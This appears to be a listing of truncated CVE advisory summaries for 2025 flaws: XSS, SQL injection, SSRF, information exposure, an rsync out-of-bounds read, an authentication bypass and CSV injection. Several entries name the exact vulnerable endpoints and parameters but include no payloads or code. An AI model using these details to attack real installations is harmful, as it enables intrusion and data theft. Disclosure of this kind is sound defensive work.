Overview CVE-2025-13349 details a stored Cross-Site Scripting (XSS) vulnerability discovered in SourceCodester Student Grades Management System version 1.0. This low-severity flaw allows attackers to inject malicious JavaScript code into the system via the “Remarks” field on the “Add New Grade Page” (/grades.php). Successful exploitation of this vulnerability could lead to account compromise, data theft, or defacement of the application. The vulnerability is remotely exploitable, and a public exploit is already available. Technical Details The vulnerability resides within the /grades.php page, specifically in the handling of the “Remarks” input field when adding a new grade. The application fails to properly sanitize…
-
-
Overview CVE-2025-13347 describes a SQL injection vulnerability discovered in SourceCodester Train Station Ticketing System version 1.0. This flaw allows a remote attacker to inject malicious SQL code via the ‘Username’ parameter when saving a user, potentially compromising the application’s database. The vulnerability exists in the /ajax.php?action=save_user endpoint. Technical Details The vulnerability stems from insufficient input validation and sanitization of the ‘Username’ parameter in the /ajax.php?action=save_user endpoint. An attacker can inject SQL code within this parameter, leading to the execution of arbitrary SQL queries on the backend database. This can allow the attacker to: Bypass authentication Extract sensitive data (user credentials,…
-
Overview CVE-2025-13346 details a SQL injection vulnerability found in SourceCodester Train Station Ticketing System version 1.0. This vulnerability allows a remote attacker to execute arbitrary SQL commands by manipulating specific input parameters. This could lead to unauthorized access to sensitive data, modification of the database, or even complete system compromise. The vulnerability is considered MEDIUM severity and is now publicly known and potentially exploitable. Technical Details The SQL injection vulnerability exists in the /ajax.php?action=save_station file. Specifically, the id and station arguments are vulnerable. By crafting malicious SQL queries within these parameters, an attacker can bypass input validation and inject code…
-
Overview CVE-2025-12545 identifies an information exposure vulnerability found in the Pixel Manager for WooCommerce – Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress. This vulnerability affects all versions up to and including 1.49.2. It allows unauthenticated attackers to access sensitive data from password-protected, private, or draft WooCommerce products. This means malicious actors could potentially gain access to product details, pricing, and other confidential information intended only for authorized users or administrators. Technical Details The vulnerability resides in the ajax_pmw_get_product_ids() function within the Pixel Manager plugin. Due to insufficient access control restrictions, this function fails to properly…
-
Overview CVE-2025-12376 identifies a Server-Side Request Forgery (SSRF) vulnerability present in the Icon List Block – Add Icon-Based Lists with Custom Styles plugin for WordPress. This vulnerability affects all versions up to and including 1.2.1. Exploitation allows authenticated attackers with Subscriber-level access (or higher) to force the web application to make requests to arbitrary internal or external locations. While the response is limited to valid JSON objects, this can still be leveraged to gather sensitive information or interact with internal services. Technical Details The vulnerability lies within the fs_api_request function of the plugin. This function, intended for internal API requests,…
-
Overview CVE-2025-10158 describes a medium-severity vulnerability affecting the rsync file transfer utility. A malicious client, acting as the receiver of an rsync transfer, can exploit this flaw to trigger an out-of-bounds read of a heap-based buffer. This occurs due to a negative array index within the rsync code when processing data sent from the server. Successful exploitation requires the attacker to have at least read access to the remote rsync module being transferred. Technical Details The vulnerability stems from how rsync handles array indexing when processing data during file transfer reception. Specifically, a carefully crafted, malicious rsync client can send…
-
Overview A significant security vulnerability, identified as CVE-2025-4212, has been discovered in the Checkout Files Upload for WooCommerce plugin for WordPress. This vulnerability is classified as a Stored Cross-Site Scripting (XSS) flaw, affecting versions up to and including 2.2.1. Unauthenticated attackers can exploit this weakness by uploading malicious image files containing injected web scripts. These scripts execute whenever a user accesses the page where the uploaded file is displayed, potentially leading to account compromise, data theft, or website defacement. Technical Details The root cause of CVE-2025-4212 lies in the plugin’s failure to properly sanitize user-supplied input during file uploads and…
-
Overview CVE-2025-41346 describes a critical authentication bypass vulnerability found in WinPlus v24.11.27, a software application developed by Informática del Este. This flaw allows an attacker to impersonate another user simply by knowing their numerical ID. Successfully exploiting this vulnerability grants the attacker unauthorized access to the victim’s account, compromising the confidentiality, integrity, and availability of the data stored within the application. Technical Details The vulnerability stems from a faulty authorization control mechanism within WinPlus v24.11.27. The application fails to adequately verify the identity of users during specific actions, relying solely on the user’s ‘numerical ID’ for authentication. An attacker can…
-
Overview CVE-2025-13196 is a MEDIUM severity Stored Cross-Site Scripting (XSS) vulnerability affecting the Element Pack Addons for Elementor plugin for WordPress. This vulnerability allows authenticated attackers with contributor-level access or higher to inject malicious JavaScript code into website pages. Specifically, it exists within the Open Street Map widget functionality. Technical Details The vulnerability stems from insufficient input sanitization and output escaping of the marker content parameter within the Open Street Map widget. This widget is part of the Element Pack Addons for Elementor plugin. Attackers can inject malicious scripts into the marker content field. Due to the lack of proper…
-
Overview A critical security vulnerability, identified as CVE-2025-13133, has been discovered in the Simple User Import Export plugin for WordPress. This vulnerability exposes websites using the plugin to a potential CSV Injection attack. The vulnerability affects all versions up to and including 1.1.7. Authenticated attackers with Administrator-level access (or higher) can exploit this flaw to embed malicious code into exported CSV files. When these files are downloaded and opened on a local system with a vulnerable configuration (e.g., Microsoft Excel with default settings), the embedded code can be executed, potentially leading to a compromise of the user’s system. Technical Details…